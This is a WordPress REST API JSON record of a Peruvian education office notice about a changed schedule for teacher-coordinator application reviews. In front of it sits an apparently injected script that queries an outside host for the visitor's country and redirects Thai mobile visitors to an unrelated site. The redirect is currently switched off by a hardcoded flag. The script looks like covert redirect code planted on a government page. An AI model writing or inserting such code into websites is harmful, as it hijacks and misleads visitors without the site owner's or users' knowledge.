<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":3088,"date":"2023-05-09T14:15:08","date_gmt":"2023-05-09T19:15:08","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=3088"},"modified":"2023-05-09T16:24:41","modified_gmt":"2023-05-09T21:24:41","slug":"comunicado-n-o-118-2023-modificacion-de-cronograma-excepcional-para-la-evaluacion-de-expedientes-para-los-cargos-de-docentes-profesor-coordinador-en-craei","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o-118-2023-modificacion-de-cronograma-excepcional-para-la-evaluacion-de-expedientes-para-los-cargos-de-docentes-profesor-coordinador-en-craei\/","title":{"rendered":"COMUNICADO N.\u00ba 120 \u2013 2023 \u2013 MODIFICACI\u00d3N DE CRONOGRAMA EXCEPCIONAL PARA LA EVALUACI\u00d3N DE EXPEDIENTES PARA LOS CARGOS DE DOCENTES PROFESOR COORDINADOR EN CRAEI"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"754\" height=\"1024\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/05\/Imagen1.png-mmmmmmmmmm-754x1024.png\" alt=\"\" class=\"wp-image-3089\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/05\/Imagen1.png-mmmmmmmmmm-754x1024.png 754w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/05\/Imagen1.png-mmmmmmmmmm-221x300.png 221w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/05\/Imagen1.png-mmmmmmmmmm-768x1042.png 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/05\/Imagen1.png-mmmmmmmmmm.png 1122w\" sizes=\"auto, (max-width: 754px) 100vw, 754px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,17],"tags":[],"class_list":["post-3088","post","type-post","status-publish","format-standard","hentry","category-comunicados","category-contrato-docente"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=3088"}],"version-history":[{"count":2,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3088\/revisions"}],"predecessor-version":[{"id":3091,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3088\/revisions\/3091"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=3088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=3088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=3088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}